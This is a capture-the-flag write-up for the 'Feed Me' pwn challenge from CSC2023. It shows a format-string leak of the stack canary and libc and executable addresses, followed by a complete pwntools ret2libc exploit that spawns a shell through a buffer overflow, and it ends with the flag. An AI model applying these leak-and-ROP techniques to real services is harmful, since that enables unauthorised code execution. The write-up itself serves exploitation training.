CSC2023 - [Pwn] - Feed Me
Challenge Description
I don't have control on myself. Sometime, I can control otherwise I can't
Solution
First of all we would check the protections on binary
All protections are enabled 😡
Let us run the binary
There is vulnerability of format strings
We would need to find libc base inorder to get shell
from pwn import *
context.log_level = 'error'
elf = context.binary = ELF('./feedmepwn')
for i in range(1, 50):
io = process()
payload = f"AAAAAAAA.%{i}$p"
io.sendline(payload.encode())
io.sendline(b'dasfsaf')
print(io.recvall(), i)
io.close()
As a tip
0x7f - libc
0x7ff - stack
0x5 - PIE
8 bytes address ending on 00 - Canary
Libc Base
use xinfo <address>
in pwndbg
you would get offset
Here offset is 0x29d90
Now after subtracting offset from address of %27$p
we would get our libc base
Final Script 🔥
#!/usr/bin/env python3
from pwn import *
context.update(os="linux", arch="amd64")
r = process("./feedmepwn")
libc = ELF("./libc.so.6", checksec=False)
# 23 is canary
# 25 leaks libc_base+171408
# 27 leaks exe_base+4553
payload = b"%23$p.%25$p.%27$p"
log.info(f"Sending payload: {payload.decode()}")
r.sendline(payload)
leak = r.recvline().decode().rstrip().split(" - ")[1]
canary, libc_leak, exe_leak = leak.split(".")
canary = int(canary, 16)
libc_leak = int(libc_leak, 16)
exe_leak = int(exe_leak, 16)
libc_base = libc_leak-0x29d90
exe_base = exe_leak-0x11c9
log.success("Got leaks!")
log.info(f"\tcanary = {hex(canary)}")
log.info(f"\tlibc_base = {hex(libc_base)}")
log.info(f"\texe_base = {hex(exe_base)}")
libc.address = libc_base
libc_rop = ROP(libc)
BINSH = next(libc.search(b"/bin/sh"))
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]
POP_RDI = libc_rop.find_gadget(['pop rdi', 'ret'])[0]
ret = libc_rop.find_gadget(['ret'])[0]
offset_to_canary = 136
payload = b""
payload += b"A" * offset_to_canary
payload += p64(canary)
payload += p64(0)
payload += p64(ret)
payload += p64(POP_RDI)
payload += p64(BINSH)
payload += p64(SYSTEM)
payload += p64(EXIT)
payload1 = cyclic(136) + pack(canary) + pack(0) + pack(libc_base+0xf1f2f)
log.info(f"Sending ret2libc payload!")
r.sendline(payload)
log.success("Enjoy your shell :)")
r.interactive()
Flag
CSC{G00d_C0mb1n4ti0n_0f_f0rm4t_Str1ngs_4nd_Buff3r_Ov3rfl0w}
Writeups 2023 © RootxRAN.